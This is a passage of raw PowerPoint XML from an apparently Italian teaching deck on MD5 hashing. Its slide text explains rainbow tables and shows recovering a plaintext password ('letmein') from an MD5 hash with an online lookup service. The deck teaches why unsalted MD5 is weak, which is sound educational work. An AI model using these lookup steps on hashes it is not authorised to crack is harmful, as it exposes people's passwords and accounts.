          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2763219" w="9883591">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9883591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9883591" y="2763220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2763220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-2717" t="-25072" r="-7744" b="-100109"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 25" id="25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11761346" y="7341719"/>
            <a:ext cx="5944359" cy="1309643"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1811322" cy="399065"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 26" id="26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1811322" cy="399065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="399065" w="1811322">
                  <a:moveTo>
                    <a:pt x="32560" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1778762" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1787397" y="0"/>
                    <a:pt x="1795679" y="3430"/>
                    <a:pt x="1801785" y="9537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1807892" y="15643"/>
                    <a:pt x="1811322" y="23925"/>
                    <a:pt x="1811322" y="32560"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1811322" y="366505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1811322" y="384487"/>
                    <a:pt x="1796744" y="399065"/>
                    <a:pt x="1778762" y="399065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="32560" y="399065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23925" y="399065"/>
                    <a:pt x="15643" y="395635"/>
                    <a:pt x="9537" y="389528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3430" y="383422"/>
                    <a:pt x="0" y="375140"/>
                    <a:pt x="0" y="366505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="32560"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="23925"/>
                    <a:pt x="3430" y="15643"/>
                    <a:pt x="9537" y="9537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15643" y="3430"/>
                    <a:pt x="23925" y="0"/>
                    <a:pt x="32560" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 27" id="27"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="1811322" cy="446690"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3079"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 28" id="28"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="4079221">
            <a:off x="10456783" y="1901379"/>
            <a:ext cx="2253818" cy="2174934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 29" id="29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="2700000">
            <a:off x="9975442" y="6805265"/>
            <a:ext cx="1873131" cy="529159"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="529159" w="1873131">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1873131" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1873131" y="529160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5291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12238561" y="9555241"/>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31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10820610" y="7383964"/>
            <a:ext cx="6849723" cy="1003763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="3999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2856">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>La password in chiaro che ci viene restituira è</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2856">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2856">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2856">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a: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960045" y="8078076"/>
            <a:ext cx="7736552" cy="7407749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7407749" w="7736552">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736552" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="-3022217" y="-2258494"/>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0800000">
            <a:off x="3969638" y="4666830"/>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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="11134744" y="-2575651"/>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6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-3966503" y="-3368396"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990406" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990406" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-2839576" y="9092970"/>
            <a:ext cx="7736552" cy="7407749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7407749" w="7736552">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736552" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="9274741" y="55203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9457382" y="4943928"/>
            <a:ext cx="8558365" cy="4285914"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4285914" w="8558365">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8558365" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8558365" y="4285914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4285914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2091197" y="438998"/>
            <a:ext cx="15168103"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4.4 - MD5 ENCRYPT &amp; DECRYPT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="274045" y="942733"/>
            <a:ext cx="9016248" cy="8002391"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2747365" cy="2438430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 12" id="12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2747365" cy="2438430"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2438430" w="2747365">
                  <a:moveTo>
                    <a:pt x="21467" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2725899" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2737755" y="0"/>
                    <a:pt x="2747365" y="9611"/>
                    <a:pt x="2747365" y="21467"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2747365" y="2416964"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2747365" y="2428819"/>
                    <a:pt x="2737755" y="2438430"/>
                    <a:pt x="2725899" y="2438430"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21467" y="2438430"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15773" y="2438430"/>
                    <a:pt x="10313" y="2436169"/>
                    <a:pt x="6287" y="2432143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2262" y="2428117"/>
                    <a:pt x="0" y="2422657"/>
                    <a:pt x="0" y="2416964"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="21467"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="9611"/>
                    <a:pt x="9611" y="0"/>
                    <a:pt x="21467" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 13" id="13"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="2747365" cy="2486055"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="3079"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 14" id="14"/>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5" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="0">
            <a:off x="9290292" y="2411787"/>
            <a:ext cx="2403928" cy="2681867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2681867" w="2403928">
                <a:moveTo>
                  <a:pt x="0" y="2681867"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2403928" y="2681867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2403928" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="268186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2586025"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7" id="17"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1417316"/>
            <a:ext cx="7672235" cy="7260590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3149"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cosa sono le Rainbow Table ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Le Rainbow Tables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>sono uno strumento potente utilizzato per la decrittazione degli hash. In pratica, le Rainbow Tables raccolgono gli output delle funzioni di hash delle parole più comuni, creando enormi database di corrispondenze tra hash e le loro possibili origini. Questo metodo sfrutta una grande quantità di pre-calcolo per velocizzare il processo di ricerca.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Ad esempio, possiamo utilizzare un servizio di decrittazione online come md5decrypt per sfruttare le Rainbow Tables. Il processo è semplice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="442596" indent="-221298" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Inserire l'hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Si inserisce l'hash che si desidera decrittare nel servizio e cliccare su Decrypt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="442596" indent="-221298" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Consultazione  delle Rainbow Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Il servizio confronta l'hash inserito con il suo database di hash pre-calcolati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="442596" indent="-221298" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Ottenere l'input originale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se l'hash è presente nella Rainbow Table, il servizio restituisce il valore originale che ha generato quell'hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2870"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5450065" y="1264655"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573838" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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66503" y="-3437559"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990406" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990406" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-9637020">
            <a:off x="13393266" y="1048933"/>
            <a:ext cx="6857699" cy="6360516"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6360516" w="6857699">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6857699" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6857699" y="6360516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6360516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6703302" y="633318"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881396" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12377903" y="4584363"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="6023903" y="4958624"/>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2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-964102" y="337832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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="6544223" y="786757"/>
            <a:ext cx="6288014" cy="8713487"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
